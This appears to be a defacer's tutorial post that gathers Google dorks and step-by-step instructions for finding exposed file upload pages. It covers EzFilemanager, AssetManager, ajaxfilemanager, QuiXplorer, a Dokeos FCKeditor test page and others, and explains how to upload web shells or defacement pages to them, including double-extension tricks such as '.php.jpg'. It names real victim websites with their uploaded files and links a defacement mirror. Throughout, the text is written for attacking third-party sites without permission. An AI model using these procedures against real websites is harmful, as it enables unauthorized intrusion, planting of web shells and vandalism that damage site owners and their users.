EzFilemanager Deface Upload vulnerability
Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)
EzFilemanager Deface Upload vulnerability
Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)
Asset Manager :Shell and Files upload Vulnerability
Google Dork : “inurl:Editor/assetmanager/assetmanager.asp”
Open Google.com/ncr and enetr this dork
“inurl:Editor/assetmanager/assetmanager.asp”
Now Open any site from search results
Now You will Got a Page Like That
|
|||
|
|||
Upload File: and site url will be like site.com/Editor/assetmanager/assetmanager.asp Change The Flash into all Files and Now choose Your File and Upload and acess Your file here site.com/Editor/assets/yourfilehere Special : How To upload a cool deface 😉 |
Open Google Search Engine, Type this dork : inurl:/plugins/ajaxfilemanager/
For Example I got :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
for example :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
Now Find Upload Upload and Upload Your shell/Deface/file
To view you File find /Uploaded/ directory in Website by using your brain 😛
example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt
Title : “Simple Upload 53” : Shell Upload Vulnerability
Google Dork : “inurl:simple-upload-53.php”
Go to Google.com and enter dork ~
“inurl:simple-upload-53.php”
see search results and select any website
the exploit url will be link this
http://www.site.com/simple-upload-53.php
Now Upolad Your shell here as .php.jpg .php.girf etc
and you can upload your deface in image Type
to view you uploaded file just goto http://www.site.com/files/yourfilehere
Demo site : http://www.stpatricksdayshirts.com/simple-upload-53.php
Uploaded file : http://www.stpatricksdayshirts.com/files/devilscafe.jpg
Funnt Thing : http://www.stpatricksdayshirts.com/simple-upload-53.php?message= Put Your Massege here it will show on website 😀
“QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability”
open Google.com and type this dork
intitle:”QuiXplorer 2.3 – the QuiX project”
you’ll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes after Going to this you will saw a file manager you can upload your files here
You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes |
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,, - anything support file click On you file For view Live demo : http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes http://www.hcs.harvard.edu/~eac/letters/filestorage/ i know some asshole will chnage the deface so its mirrOr of defacements http://attack-h.org/attack/?id=8452
Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password
Google Dork : “Portail Dokeos 1.8.5”
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here
“File thingie” ~ Deface & Shell Upload vulnerability
Google Dork : inurl:ft2.php intext:upload
Goto Site and Upload Your deface or Shell, T view Your File Click on file in list After Uploading
Comment If you Have Problem !
Title : “Encodable” ~ another File upload Vulnerablity
“Add Testimonial” ~ remote File upload vulnerability.
Google Dork : 2011 all rights reserved.Website Designed by GanjaDaddy.com
[#1] Open website ..
[#2] Go to this URL : testimonial/add.html.php For example : http://Site.com/testimonial/add.html.php
[#3] Now Upload Your Deface or any file
[#4] to view you upload file go to /images/testimonial/ , you’ll se index of files here … click on last file, its urs !!
[#5] enjOy =) Leave a Comment beLow if you Like it
“CMS admin Image Uploader” Shell Upload Vulnrability
Google dorks
inurl:”default_image.asp”
inurl:”default_imagen.asp”
You’ll got a upload option after clicking on link that you got in google serach results